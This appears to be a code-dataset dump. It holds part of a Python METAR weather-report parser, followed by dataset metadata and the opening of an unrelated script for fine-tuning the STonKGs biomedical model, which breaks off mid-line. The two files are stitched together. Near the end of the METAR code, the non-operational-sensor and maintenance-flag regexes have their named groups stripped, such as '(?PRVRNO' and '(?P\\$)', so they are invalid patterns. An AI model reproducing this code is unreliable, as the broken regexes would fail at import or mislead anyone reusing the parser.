frac)\n\n\ndef vis_to_float(dist, units):\n    'Convert visibility, including fraction, to a value with units'\n    if dist[0] == 'M':\n        dist = dist[1:]\n    dist = dist.strip()\n\n    if '/' in dist:\n        # Handle the case where the entire group is all '////'\n        if dist[0] == '/' and all(c == '/' for c in dist):\n            return float('nan') * units\n        parts = dist.split(maxsplit=1)\n        if len(parts) > 1:\n            return as_value(parts[0], units) + frac_to_float(parts[1]) * units\n        else:\n            return frac_to_float(dist) * units\n    else:\n        return as_value(dist, units)\n\n\ndef process_vis(matches):\n    if matches['cavok']:\n        return 'CAVOK'\n    elif matches['vismiles']:\n        return vis_to_float(matches['vismiles'], units.mile)\n    elif matches['vismetric']:\n        return as_value(matches['vismetric'], units.meter)\n\nvis = RegexParser(r'''(?P<cavok>CAVOK)|\n                      ((?P<vismiles>M?(([1-9]\d?)|(([12][ ]?)?1?[13579]/1?[2468])|////))SM\b)|\n                      (?P<vismetric>\b\d{4}\b)''', process_vis)\n\n\n# Runway visual range (RDD/VVVV(VVVVV)FT)\ndef to_rvr_value(dist, units):\n    if dist[0] in ('M', 'P'):\n        dist = dist[1:]\n    return as_value(dist, units)\n\n\ndef process_rvr(matches):\n    dist_units = units(matches.pop('units').lower())\n    ret = dict()\n    ret[matches['runway']] = to_rvr_value(matches['distance'], dist_units)\n    if matches['max_dist']:\n        ret[matches['runway']] = (ret[matches['runway']],\n                                  to_rvr_value(matches['max_dist'], dist_units))\n    if matches['change']:\n        change_map = dict(D='down', U='up', N='no change')\n        ret[matches['runway']] = (ret[matches['runway']], change_map[matches['change']])\n\n    return ret\n\nrvr = RegexParser(r'''R(?P<runway>\d{2}[RLC]?)\n                      /(?P<distance>[MP]?\d{4})\n                      (V(?P<max_dist>[MP]?\d{4}))?\n                      (?P<units>FT)/?(?P<change>[UDN])?''', process_rvr)\n\n\n# Present weather (w'w')\nprecip_abbr = {'DZ': 'Drizzle', 'RA': 'Rain', 'SN': 'Snow', 'SG': 'Snow Grains',\n               'IC': 'Ice Crystals', 'PL': 'Ice Pellets', 'GR': 'Hail',\n               'GS': 'Small Hail or Snow Pellets', 'UP': 'Unknown Precipitation',\n               'RASN': 'Rain and Snow'}\n\n\nclass Weather(namedtuple('WxBase', 'mod desc precip obscur other')):\n    lookups = [{'-': 'Light', '+': 'Heavy', 'VC': 'In the vicinity'},\n               {'MI': 'Shallow', 'PR': 'Partial', 'BC': 'Patches', 'DR': 'Low Drifting',\n                'BL': 'Blowing', 'SH': 'Showers', 'TS': 'Thunderstorm', 'FZ': 'Freezing'},\n               precip_abbr,\n               {'BR': 'Mist', 'FG': 'Fog', 'FU': 'Smoke', 'VA': 'Volcanic Ash',\n                'DU': 'Widespread Dust', 'SA': 'Sand', 'HZ': 'Haze', 'PY': 'Spray'},\n               {'PO': 'Well-developed Dust/Sand Whirls', 'SQ': 'Squalls', 'FC': 'Funnel Cloud',\n                'SS': 'Sandstorm', 'DS': 'Duststorm'}]\n\n    @classmethod\n    def fillin(cls, **kwargs):\n        args = [None] * 5\n        base = cls(*args)\n        return base._replace(**kwargs)\n\n    def __str__(self):\n        if self.mod == '+' and self.other == 'FC':\n            return 'Tornado'\n\n        return ' '.join(lookup[val] for val, lookup in zip(self, self.lookups) if val)\n\n\ndef process_wx(matches):\n    if matches['vdesc']:\n        matches['mod'] = matches.pop('vicinity')\n        matches['desc'] = matches.pop('vdesc')\n        if matches['desc'] == 'ST':\n            matches['desc'] = 'TS'\n    else:\n        matches.pop('vdesc')\n        matches.pop('vicinity')\n\n    return Weather(**matches)\n\nwx = RegexParser(r'''(((?P<mod>[-+])|\b)  # Begin with one of these mods or nothing\n                     (?P<desc>MI|PR|BC|DR|BL|SH|TS|FZ)?\n                     ((?P<precip>(DZ|RA|SN|SG|IC|PL|GR|GS|UP){1,3})\n                     |(?P<obscur>BR|FG|FU|VA|DU|SA|HZ|PY)\n                     |(?P<other>PO|SQ|FC|SS|DS)))\n                     |((?P<vicinity>VC)?(?P<vdesc>SH|TS|ST))''', process_wx, repeat=True)\n
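\n# Editor's worked example (illustrative): for the token '-TSRA' the wx group above\n# captures mod='-', desc='TS', precip='RA', and str(Weather(...)) renders it as\n# 'Light Thunderstorm Rain'; '+FC' is special-cased by Weather.__str__ to 'Tornado'.\n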
\n\n# Sky condition (NNNhhh or VVhhh or SKC/CLR)\ndef process_sky(matches):\n    coverage_to_value = dict(VV=8, FEW=2, SCT=4, BKN=6, BKM=6, OVC=8)\n    if matches.pop('clear'):\n        return float('nan'), 0, None\n    hgt = as_value(matches['height'], 100 * units.feet)\n    return hgt, coverage_to_value[matches['coverage']], matches['cumulus']\n\nsky_cover = RegexParser(r'''\b(?P<clear>SKC|CLR|NSC|NCD)\b|\n                            ((?P<coverage>VV|FEW|SCT|BK[MN]|OVC)\n                            \ ?(?P<height>\d{3})\n                            (?P<cumulus>CB|TCU)?)''', process_sky, repeat=True)\n\n\n# Temperature/Dewpoint group -- whole values (TT/TdTd)\ndef parse_whole_temp(temp):\n    if temp in ('//', 'MM'):\n        return float('NaN') * units.degC\n    elif temp.startswith('M'):\n        return -as_value(temp[1:], units.degC)\n    else:\n        return as_value(temp, units.degC)\n\n\ndef process_temp(matches):\n    temp = parse_whole_temp(matches['temperature'])\n    if matches['dewpoint']:\n        dewpt = parse_whole_temp(matches['dewpoint'])\n    else:\n        dewpt = float('NaN') * units.degC\n\n    return temp, dewpt\n\nbasic_temp = RegexParser(r'''(?P<temperature>(M?\d{2})|MM)/\n                             (?P<dewpoint>(M?[\d]{1,2})|//|MM)?''', process_temp)\n\n\n# Altimeter setting (APPPP)\ndef process_altimeter(matches):\n    if matches['unit'] == 'A':\n        alt_unit = 0.01 * units.inHg\n    else:\n        alt_unit = units('mbar')\n    return as_value(matches['altimeter'], alt_unit)\n\naltimeter = RegexParser(r'\b(?P<unit>[AQ])(?P<altimeter>\d{4})', process_altimeter,\n                        repeat=True, keepall=False)\n\n#\n# Extended International groups\n#\n\n# Runway conditions\nrunway_extent = {'1': 0.1, '2': 0.25, '5': 0.5, '9': 1.0, '/': float('NaN')}\nrunway_contaminant = {'0': 'Clear and dry', '1': 'Damp', '2': 'Wet and water patches',\n                      '3': 'Rime and frost covered', '4': 'Dry snow', '5': 'Wet snow',\n                      '6': 'Slush', '7': 'Ice', '8': 'Compacted or rolled snow',\n                      '9': 'Frozen ruts or ridges', '/': 'No Report'}\n\n\ndef runway_code_to_depth(code):\n    if code == '//':\n        return float('NaN') * units.mm\n    code = int(code)\n    if code < 91:\n        return code * units.mm\n    elif code < 99:\n        return (code - 90) * 5 * units.cm\n    else:\n        return 'Inoperable'\n\n\ndef runway_code_to_braking(code):\n    if code == '//':\n        return float('NaN')\n    code = int(code)\n    if code < 91:\n        return float(code) / 100\n    else:\n        return {91: 'poor', 92: 'medium/poor', 93: 'medium', 94: 'medium/good',\n                95: 'good'}.get(code, 'unknown')\n\n\ndef process_runway_state(matches):\n    if matches['deposit']:\n        matches['deposit'] = runway_contaminant.get(matches['deposit'], 'Unknown')\n    if matches['extent']:\n        matches['extent'] = runway_extent.get(matches['extent'], 'Unknown')\n    if matches['depth']:\n        matches['depth'] = runway_code_to_depth(matches['depth'])\n\n    matches['cleared'] = bool(matches['cleared'])\n    matches['braking'] = runway_code_to_braking(matches['braking'])\n\n    return matches\n\n\nrunway_state = RegexParser(r'''\bR(?P<runway>\d{2})\n                               /((?P<deposit>[\d/])(?P<extent>[\d/])(?P<depth>\d{2}|//)|(?P<cleared>CLRD))?\n                               (?P<braking>\d{2}|//)''', process_runway_state)\n\n# Trend forecast (mostly international)\ntrend_forecast_regex = re.compile(r'\b(?P<trend>NOSIG|BECMG|TEMPO)')\n\n#\n# Parsers for METAR groups -- remarks\n#\n\n\n# Combine time in the remark with the report datetime to make a proper datetime object\ndef process_time(matches, context):\n    repl = dict(minute=int(matches['minute']))\n    if matches['hour']:\n        repl['hour'] = int(matches['hour'])\n\n    return context['datetime'].replace(**repl)\n\n# Volcanic eruption, first in NWS reports\nvolcano = RegexParser(r'[A-Z0-9 .]*VOLCANO[A-Z0-9 .]*')\n\n# Type of automatic station\nautomated_type = RegexParser(r'\bA[O0][12]A?')\n\n\n# Peak wind remark (PK WND dddfff/hhmm)\ndef process_peak_wind(matches, context):\n    peak_time = process_time(matches, context)\n    return dict(time=peak_time, speed=as_value(matches['speed'], context['speed_units']),\n                direction=as_value(matches['direction'], units.deg))\n\npeak_wind = RegexParser(r'''\bPK\ WND\ ?(?P<direction>\d{3})\n                            (?P<speed>\d{2,3})/\n                            (?P<hour>\d{2})?\n                            (?P<minute>\d{2})''', process_peak_wind)\n\n\n# Wind shift (WSHFT hhmm)\ndef process_shift(matches, context):\n    time = process_time(matches, context)\n    front = bool(matches['frontal'])\n    return dict(time=time, frontal=front)\n\nwind_shift = RegexParser(r'''\bWSHFT\ (?P<hour>\d{2})?\n                             (?P<minute>\d{2})\n                             \ (?P<frontal>FROPA)?''', process_shift)\n\n\n# Tower/surface visibility (TWR(SFC) VIS vvvvv)\ndef process_twrsfc_vis(matches, *args):\n    abbr_to_kind = dict(TWR='tower', SFC='surface')\n    return {abbr_to_kind[matches['kind']]: vis_to_float(matches['vis'], units.mile)}\n\nsfc_vis = RegexParser(r'''(?P<kind>TWR|SFC)\ VIS\n                          \ (?P<vis>[0-9 /]{1,5})''', process_twrsfc_vis)\n\n\n# Variable prevailing visibility (VIS vvvvvVvvvvv)\ndef process_var_vis(matches, *args):\n    vis1 = vis_to_float(matches['vis1'], units.mile)\n    vis2 = vis_to_float(matches['vis2'], units.mile)\n    return vis1, vis2\n\nvar_vis = RegexParser(r'''VIS\ (?P<vis1>M?[0-9 /]{1,5})V\n                          (?P<vis2>[0-9 /]{1,5})''', process_var_vis)\n\n\n# Sector visibility (VIS DIR vvvvv)\ndef process_sector_vis(matches, *args):\n    # compass_to_float = dict(N=0, NE=45, E=90, SE=135, S=180, SW=225, W=270, NW=315)\n    vis = vis_to_float(matches['vis'], units.mile)\n    return {matches['direc']: vis}\n\nsector_vis = RegexParser(r'''VIS\ (?P<direc>[NSEW]{1,2})\n                             \ (?P<vis>[0-9 /]{1,5})''', process_sector_vis)\n\n\n# Lightning\ndef process_lightning(matches, *args):\n    if not matches['dist']:\n        matches.pop('dist')\n\n    if not matches['loc']:\n        matches.pop('loc')\n\n    if not matches['type']:\n        matches.pop('type')\n    else:\n        type_str = matches['type']\n        matches['type'] = []\n        while type_str:\n            matches['type'].append(type_str[:2])\n            type_str = type_str[2:]\n\n    if not matches['frequency']:\n        matches.pop('frequency')\n\n    return matches\n\nlightning = RegexParser(r'''((?P<frequency>OCNL|FRQ|CONS)\ )?\n                            \bLTG(?P<type>(IC|CG|CC|CA)+)?\n                            \ ((?P<dist>OHD|VC|DSNT)\ )?\n                            (?P<loc>([NSEW\-]|ALQD?S|\ AND\ |\ THRU\ )+)?\b''',\n                        process_lightning)\n\n# Precipitation/Thunderstorm begin and end\nprecip_times_regex = re.compile(r'([BE])(\d{2,4})')\n\n\ndef process_precip_times(matches, context):\n    ref_time = context['datetime']\n    kind = matches['precip']\n    times = []\n    start = None\n    for be, time in precip_times_regex.findall(matches['times']):\n        if len(time) == 2:\n            time = ref_time.replace(minute=int(time))\n        else:\n            time = ref_time.replace(hour=int(time[:2]), minute=int(time[2:4]))\n\n        if be == 'B':\n            start = time\n        else:\n            if start:\n                times.append((start, time))\n                start = None\n            else:\n                times.append((None, time))\n\n    if start:\n        times.append((start, None))\n\n    return kind, times\n\nprecip_times = RegexParser(r'''(SH)?(?P<precip>TS|DZ|FZRA|RA|SN|SG|IC|PL|GR|GS|UP)\n                               (?P<times>([BE]([0-2]\d)?[0-5]\d)+)''',\n                           process_precip_times, repeat=True)\n\n\n# Thunderstorm (TS LOC MOV DIR)\ndef process_thunderstorm(matches, *args):\n    return matches\n\nthunderstorm = RegexParser(r'''\bTS\ (?P<loc>[NSEW\-]+)(\ MOV\ (?P<dir>[NSEW\-]+))?''',\n                           process_thunderstorm)\n\n# Virga\nvirga = RegexParser(r'''\bVIRGA\ (?P<direction>[NSEW\-])''', grab_group('direction'))\n\n\n# Variable Ceiling\ndef process_var_ceiling(matches, *args):\n    return (as_value(matches['ceil1'], 100 * units.feet),\n            as_value(matches['ceil2'], 100 * units.feet))\n\nvar_ceiling = RegexParser(r'\bCIG\ (?P<ceil1>\d{3})V(?P<ceil2>\d{3})\b', process_var_ceiling)\n\n\n# Variable sky cover\ndef process_var_sky(matches, *args):\n    matches['height'] = as_value(matches['height'], 100 * units.feet)\n    matches['cover'] = (matches.pop('cover1'), matches.pop('cover2'))\n    return matches\n\nvar_sky = RegexParser(r'''\b(?P<cover1>CLR|FEW|SCT|BKN|OVC)\n                          (?P<height>\d{3})?\ V\n                          \ (?P<cover2>CLR|FEW|SCT|BKN|OVC)''', process_var_sky)\n\n# Mountains obscured\nmountains = RegexParser(r'''\bMTNS?(\ PTLY)?(\ OBSCD?)?(\ DSNT)?(\ [NSEW\-]+)?''')\n\n# Significant cloud types (CLD DIR (MOV DIR))\nsig_cloud = RegexParser(r'''(?P<kind>CB(MAM)?|TCU|ACC|[ACS]CSL|(APRNT\ ROTOR\ CLD))\n                            \ (?P<loc>VC\ ALQD?S|[NSEW-]+)(\ MOV\ (?P<dir>[NSEW]{1,2}))?''')\n\n\n# Cloud Types (8/ClCmCh)\ndef process_cloud_types(matches, *args):\n    ret = dict()\n    for k, v in matches.items():\n        if v == '/':\n            ret[k] = None\n        else:\n            ret[k] = int(v)\n    return ret\n\ncloud_types = RegexParser(r'''\b8/(?P<low>[\d/])(?P<mid>[\d/])(?P<high>[\d/])''',\n                          process_cloud_types)\n\n\n# Pressure changes (PRESRR/PRESFR)\ndef process_pressure_change(matches, *args):\n    if matches['tend'] == 'R':\n        return 'rising rapidly'\n    else:\n        return 'falling rapidly'\n\npressure_change = RegexParser(r'\bPRES(?P<tend>[FR])R\b', process_pressure_change)\n\n\n# Sea-level pressure (SLPppp)\ndef process_slp(matches, *args):\n    if matches['slp'] == 'NO':\n        matches['slp'] = 'NaN'\n\n    
slp = as_value(matches['slp'], 0.1 * units('mbar'))\n    if slp < 50 * units('mbar'):\n        slp += 1000 * units('mbar')\n    else:\n        slp += 900 * units('mbar')\n    return slp\n\nslp = RegexParser(r'SLP(?P<slp>\d{3}|NO)', process_slp)\n\n\n# No SPECI\nnospeci = RegexParser(r'\bNO(\ )?SPECI')\n\n# First/last report\nreport_sequence = RegexParser(r'''\b(FIRST|LAST)''')\n\n\n# Parse precip report\ndef parse_rmk_precip(precip):\n    return as_value(precip, 0.01 * units.inch)\n\n\n# Hourly Precip (Prrrr)\nhourly_precip = RegexParser(r'\bP(?P<precip>\d{4})\b', grab_group('precip', parse_rmk_precip))\n\n# 3/6-hour precip (6RRRR)\nperiod_precip = RegexParser(r'\b6(?P<precip>\d{4}|////)',\n                            grab_group('precip', parse_rmk_precip))\n\n\n# Parse snow report\ndef parse_rmk_snow(snow):\n    return as_value(snow, 0.1 * units.inch)\n\n# 6-hour snow (931RRR)\nsnow_6hr = RegexParser(r'\b931(?P<snow>\d{3})\b', grab_group('snow', parse_rmk_snow))\n\n\ndef parse_rmk_snow_depth(snow):\n    return as_value(snow, units.inch)\n\n# Snow depth\nsnow_depth = RegexParser(r'\b4/(?P<snow>\d{3})\b', grab_group('snow', parse_rmk_snow_depth))\n\n# Snow liquid equivalent (933RRR)\nsnow_liquid_equivalent = RegexParser(r'\b933(?P<snow>\d{3})\b',\n                                     grab_group('snow', parse_rmk_snow))\n\n# 24-hour precip (7RRRR)\ndaily_precip = RegexParser(r'\b7(?P<precip>\d{4}|////)',\n                           grab_group('precip', parse_rmk_precip))\n\n# Hourly ice accretion (I1RRR)\nhourly_ice = RegexParser(r'\bI1(?P<ice>\d{3})', grab_group('ice', parse_rmk_precip))\n\n# 3-hour ice accretion (I3RRR)\nice_3hr = RegexParser(r'\bI3(?P<ice>\d{3})', grab_group('ice', parse_rmk_precip))\n\n# 6-hour ice accretion (I6RRR)\nice_6hr = RegexParser(r'\bI6(?P<ice>\d{3})', grab_group('ice', parse_rmk_precip))\n\n\n# Handles parsing temperature format from remarks\ndef parse_rmk_temp(temp):\n    if temp.startswith('1'):\n        return -as_value(temp[1:], 0.1 * units.degC)\n    else:\n        return as_value(temp, 0.1 * units.degC)\n\n\n# Hourly temperature (TsTTTsTdTdTd)\ndef process_hourly_temp(matches, *args):\n    temp = parse_rmk_temp(matches['temperature'])\n    if matches['dewpoint']:\n        dewpt = parse_rmk_temp(matches['dewpoint'])\n    else:\n        dewpt = float('NaN') * units.degC\n    return temp, dewpt\n\nhourly_temp = RegexParser(r'''\bT(?P<temperature>[01]\d{3})\n                              (?P<dewpoint>[01]\d{3})?''', process_hourly_temp)\n\n\n# 6-hour max temp (1sTTT)\nmax_temp_6hr = RegexParser(r'\b1(?P<temperature>[01]\d{3})\b',\n                           grab_group('temperature', parse_rmk_temp))\n\n# 6-hour min temp (2sTTT)\nmin_temp_6hr = RegexParser(r'\b2(?P<temperature>[01]\d{3})\b',\n                           grab_group('temperature', parse_rmk_temp))\n\n\n# 24-hour temp (4sTTTsTTT)\ndef process_daily_temp(matches, *args):\n    return parse_rmk_temp(matches['min']), parse_rmk_temp(matches['max'])\n\ndaily_temp_range = RegexParser(r'\b4(?P<min>[01]\d{3})\ ?(?P<max>[01]\d{3})\b',\n                               process_daily_temp)\n\n\n# 3-hour pressure tendency (5appp)\ndef process_press_tend(matches, *args):\n    return int(matches['character']), as_value(matches['amount'], 0.1 * units.mbar)\n\npress_tend = RegexParser(r'5(?P<character>[0-8])(?P<amount>\d{3})\b', process_press_tend)\n\n\n# Parse non-operational sensors\ndef process_nonop_sensors(matches, *args):\n    sensors = dict(RVRNO='Runway Visual Range', PWINO='Present Weather Identifier',\n                   PNO='Precipitation', FZRANO='Freezing Rain Sensor',\n                   TSNO='Lightning Detection System', VISNO='Secondary Visibility Sensor',\n                   CHINO='Secondary Ceiling Height Indicator')\n    if matches['nonop']:\n        return sensors.get(matches['nonop'], matches['nonop'])\n    if matches['nonop2']:\n        return sensors.get(matches['nonop2'], matches['nonop2']), matches['loc']\n
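\n# Editor's note (illustrative): new remark groups follow the same processor-plus-parser\n# pattern; a hypothetical snow-increase group, say 'SNINCR 2/10', could be added as\n#     snow_incr = RegexParser(r'SNINCR (?P<rate>\d+)/(?P<depth>\d+)', lambda m: m)\n# and registered in MetarParser.remarks above. The parser below maps sensor codes such\n# as PWINO to readable names.\nnon_op_sensors = 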
RegexParser(r'''\\b(?PRVRNO|PWINO|PNO|FZRANO|TSNO)\n |((?PVISNO|CHINO)\\ (?P\\w+))''',\n process_nonop_sensors, repeat=True)\n\n# Some free-text remarks\npilot_remark = RegexParser(r'([\\w\\ ;\\.]*ATIS\\ \\w[\\w\\ ;\\.]*)|(QFE[\\d\\.\\ ]+)')\n\n# Parse maintenance flag\nmaint = RegexParser(r'(?P\\$)', grab_group('maint', bool), default=False)\n","sub_path":"metpy/io/metar.py","file_name":"metar.py","file_ext":"py","file_size_in_byte":31714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"294616105","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Runs the STonKGs model on the fine-tuning classification task, assuming the model embeddings are pre-trained.\n\nRun with:\npython -m src.stonkgs.models.stonkgs_finetuning\n\"\"\"\n\nimport logging\nimport os\nfrom collections import Counter\nfrom typing import Dict, List, Optional\n\nimport click\nimport mlflow\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import KFold, StratifiedShuffleSplit\nfrom tqdm import tqdm\nfrom transformers.modeling_outputs import SequenceClassifierOutput\nfrom transformers.models.bert import BertModel, BertTokenizer, BertTokenizerFast\nfrom transformers.trainer import Trainer, TrainingArguments\n\nfrom stonkgs.constants import (\n CELL_LINE_DIR,\n CELL_TYPE_DIR,\n CORRECT_DIR,\n DEEPSPEED_CONFIG_PATH,\n DISEASE_DIR,\n EMBEDDINGS_PATH,\n LOCATION_DIR,\n MLFLOW_FINETUNING_TRACKING_URI,\n NLP_MODEL_TYPE,\n ORGAN_DIR,\n PRETRAINED_STONKGS_PATH,\n RANDOM_WALKS_PATH,\n RELATION_TYPE_DIR,\n SPECIES_DIR,\n STONKGS_OUTPUT_DIR,\n VOCAB_FILE,\n)\nfrom stonkgs.models.kg_baseline_model import prepare_df\nfrom stonkgs.models.stonkgs_model import STonKGsForPreTraining\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n# Disable alembic info\nlogging.getLogger(\"alembic\").setLevel(logging.WARNING)\n\n\ndef get_train_test_splits(\n train_data: pd.DataFrame,\n type_column_name: str = \"labels\",\n random_seed: int = 42,\n n_splits: int = 5,\n max_dataset_size: int = 100000,\n) -> List:\n \"\"\"Return train/test indices for n_splits many splits based on the fine-tuning dataset that is passed.\"\"\"\n # Leave out the label in the dataset\n data = train_data.drop(type_column_name, axis=1)\n labels = train_data[type_column_name]\n\n # Cut the dataset down to max_dataset_size (deterministically!) 
using StratifiedShuffleSplit if needed:\n # (this is not an actual train/test split, this is just for getting a dataset of size max_dataset_size in a\n # stratified and deterministic manner)\n if len(data) > max_dataset_size:\n splitter = StratifiedShuffleSplit(\n n_splits=1,\n train_size=max_dataset_size,\n random_state=random_seed,\n )\n for train_index, _ in splitter.split(data, labels):\n data = data.iloc[train_index, :].reset_index(drop=True)\n labels = labels.iloc[train_index].reset_index(drop=True)\n\n # Generate the actual train/test splits here:\n # Implement non-stratified train/test splits\n skf = KFold(n_splits=5 if n_splits == 1 else n_splits, random_state=random_seed, shuffle=True)\n result_indices = [\n {\"train_idx\": train_idx, \"test_idx\": test_idx}\n for train_idx, test_idx in skf.split(data, labels)\n ]\n\n if n_splits == 1:\n return [result_indices[0]]\n else:\n return result_indices\n\n\ndef preprocess_fine_tuning_data(\n train_data_path: str,\n class_column_name: str = \"class\",\n embedding_name_to_vector_path: str = EMBEDDINGS_PATH,\n embedding_name_to_random_walk_path: str = RANDOM_WALKS_PATH,\n nlp_model_type: str = NLP_MODEL_TYPE,\n sep_id: int = 102,\n unk_id: int = 100,\n) -> pd.DataFrame:\n \"\"\"Generate input_ids, attention_mask, token_type_ids etc. based on the source, target, evidence columns.\"\"\"\n # Load the KG embedding dict to convert the names to numeric indices\n kg_embed_dict = prepare_df(embedding_name_to_vector_path)\n kg_name_to_idx = {key: i for i, key in enumerate(kg_embed_dict.keys())}\n # Load the random walks for each node\n random_walk_dict = prepare_df(embedding_name_to_random_walk_path)\n # Convert random walk sequences to list of numeric indices\n random_walk_idx_dict = {\n k: [kg_name_to_idx[node] for node in v] for k, v in random_walk_dict.items()\n }\n\n # Load the raw fine-tuning dataset with source, target and evidence\n unprocessed_df = pd.read_csv(\n train_data_path, sep=\"\\t\", usecols=[\"source\", \"target\", \"evidence\", class_column_name]\n )\n\n # TODO: leave it out later on?\n # Filter out any triples that contain a node that is not in the embeddings_dict\n original_length = len(unprocessed_df)\n unprocessed_df = unprocessed_df[\n unprocessed_df[\"source\"].isin(kg_embed_dict.keys())\n & unprocessed_df[\"target\"].isin(kg_embed_dict.keys())\n ].reset_index(drop=True)\n new_length = len(unprocessed_df)\n logger.info(\n f\"{original_length - new_length} out of {original_length} triples are left out because they contain \"\n f\"nodes which are not present in the pre-training data\"\n )\n\n # Check how many nodes in the fine-tuning dataset are not covered by the learned KG embeddings\n number_of_pre_training_nodes = len(\n set(unprocessed_df[\"source\"]).union(set(unprocessed_df[\"target\"]))\n )\n if number_of_pre_training_nodes > len(kg_embed_dict):\n logger.warning(\n f\"{number_of_pre_training_nodes - len(kg_embed_dict)} out of {number_of_pre_training_nodes}\"\n f\"nodes are not covered by the embeddings learned in the pretraining dataset\"\n )\n\n # Get the length of the text or entity embedding sequences (2 random walks + 2 = entity embedding sequence length)\n random_walk_length = len(next(iter(random_walk_idx_dict.values())))\n half_length = random_walk_length * 2 + 2\n\n # Initialize a FAST tokenizer if it's the default one (BioBERT)\n if nlp_model_type == NLP_MODEL_TYPE:\n # Initialize the fast tokenizer for getting the text token ids\n tokenizer = BertTokenizerFast(vocab_file=VOCAB_FILE)\n else:\n # Initialize a 
slow tokenizer used for getting the text token ids\n tokenizer = BertTokenizer.from_pretrained(nlp_model_type)\n\n # Initialize the preprocessed data\n fine_tuning_preprocessed = []\n\n # Log progress with a progress bar\n for _, row in tqdm(\n unprocessed_df.iterrows(),\n total=unprocessed_df.shape[0],\n desc=\"Preprocessing the fine-tuning dataset\",\n ):\n # 1. \"Token type IDs\": 0 for text tokens, 1 for entity tokens\n token_type_ids = [0] * half_length + [1] * half_length\n\n # 2. Tokenization for getting the input ids and attention masks for the text\n # Use encode_plus to also get the attention mask (\"padding\" mask)\n encoded_text = tokenizer.encode_plus(\n row[\"evidence\"],\n padding=\"max_length\",\n truncation=True,\n max_length=half_length,\n )\n text_token_ids = encoded_text[\"input_ids\"]\n text_attention_mask = encoded_text[\"attention_mask\"]\n\n # 3. Get the random walks sequence and the node indices, add the SEP (usually with id=102) in between\n # Use a sequence of UNK tokens if the node is not contained in the dictionary of the nodes from pre-training\n random_w_source = (\n random_walk_idx_dict[row[\"source\"]]\n if row[\"source\"] in random_walk_idx_dict.keys()\n else [unk_id] * random_walk_length\n )\n random_w_target = (\n random_walk_idx_dict[row[\"target\"]]\n if row[\"target\"] in random_walk_idx_dict.keys()\n else [unk_id] * random_walk_length\n )\n random_w_ids = random_w_source + [sep_id] + random_w_target + [sep_id]\n\n # 4. Total attention mask (attention mask is all 1 for the entity sequence)\n attention_mask = text_attention_mask + [1] * half_length\n\n # 5. Total input_ids = half text ids + half entity ids\n input_ids = text_token_ids + random_w_ids\n\n # Add all the features to the preprocessed data\n fine_tuning_preprocessed.append(\n {\n \"input_ids\": input_ids,\n \"attention_mask\": attention_mask,\n \"token_type_ids\": token_type_ids, # Remove the MLM, ELM and NSP labels since it's not needed anymore\n \"labels\": row[\n class_column_name\n ], # Add the annotation/relation label for fine-tuning instead\n }\n )\n\n # Put the preprocessed data into a dataframe\n fine_tuning_preprocessed_df = pd.DataFrame(fine_tuning_preprocessed)\n\n return fine_tuning_preprocessed_df\n\n\nclass INDRADataset(torch.utils.data.Dataset):\n \"\"\"Custom Dataset class for INDRA data containing the combination of text and KG triple data.\"\"\"\n\n def __init__(\n self,\n encodings,\n labels,\n ):\n \"\"\"Initialize INDRA Dataset based on the combined input sequence consisting of text and triple data.\"\"\"\n self.encodings = encodings\n # Assumes that the labels are numerically encoded\n self.labels = labels\n\n def __getitem__(self, idx):\n \"\"\"Return data entries for given indices.\"\"\"\n item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\n item[\"labels\"] = torch.tensor(self.labels[idx])\n return item\n\n def __len__(self):\n \"\"\"Return the length of the dataset.\"\"\"\n return len(self.labels)\n\n\nclass STonKGsForSequenceClassification(STonKGsForPreTraining):\n \"\"\"Create the fine-tuning part of the STonKGs model based the pre-trained STonKGs model.\n\n Note that this class inherits from STonKGsForPreTraining rather than PreTrainedModel, thereby it's deviating from\n the typical huggingface inheritance logic of the fine-tuning classes.\n \"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Initialize the STonKGs sequence classification model based on the pre-trained STonKGs model architecture.\"\"\"\n super().__init__(config, 
**kwargs)\n self.num_labels = config.num_labels\n self.config = config\n\n # Load the pretrained STonKGs Transformer here\n self.bert = BertModel(config)\n self.dropout = torch.nn.Dropout(config.hidden_dropout_prob)\n self.classifier = torch.nn.Linear(config.hidden_size, config.num_labels)\n\n # Initialize all the pre-trained as well as new weights (i.e. classifier weights) here\n self.init_weights()\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n inputs_embeds=None,\n labels=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n ):\n \"\"\"Perform one forward pass for a given sequence of text_input_ids + ent_input_ids.\"\"\"\n # TODO documentation for each parameter\n # TODO type annotations for each parameter\n # Use the LM backbone to get the pre-trained token embeddings\n # batch x half_length x hidden_size\n # The first element of the returned tuple from the LM backbone forward() pass is the sequence of hidden states\n token_embeddings = self.lm_backbone(input_ids[:, : self.cls.predictions.half_length])[0]\n\n # Use the KG backbone to obtain the pre-trained entity embeddings\n # batch x half_length x hidden_size\n ent_embeddings = torch.stack(\n [\n # for each numeric index in the random walks sequence: get the embedding vector from the KG backbone\n torch.stack([self.kg_backbone[i.item()] for i in j])\n # for each example in the batch: get the random walks sequence\n for j in input_ids[:, self.cls.predictions.half_length :]\n ],\n )\n\n # Concatenate token and entity embeddings obtained from the LM and KG backbones and cast to float\n # batch x seq_len x hidden_size\n inputs_embeds = (\n torch.cat(\n [token_embeddings, ent_embeddings.to(token_embeddings.device)],\n dim=1,\n )\n .type(torch.FloatTensor)\n .to(self.device)\n )\n\n # Get the hidden states from the pretrained STonKGs Transformer layers\n outputs = self.bert(\n inputs_embeds=inputs_embeds,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n head_mask=head_mask,\n return_dict=None,\n )\n # Only use the pooled output (of the [CLS] token)\n pooled_output = outputs[1]\n\n # Apply dropout and the linear layer\n pooled_output = self.dropout(pooled_output)\n logits = self.classifier(pooled_output)\n\n loss = None\n if labels is not None:\n if self.config.problem_type is None:\n if self.num_labels == 1:\n self.config.problem_type = \"regression\"\n elif self.num_labels > 1 and (\n labels.dtype == torch.long or labels.dtype == torch.int\n ):\n self.config.problem_type = \"single_label_classification\"\n else:\n self.config.problem_type = \"multi_label_classification\"\n\n if self.config.problem_type == \"regression\":\n loss_fct = torch.nn.MSELoss()\n loss = loss_fct(logits.view(-1, 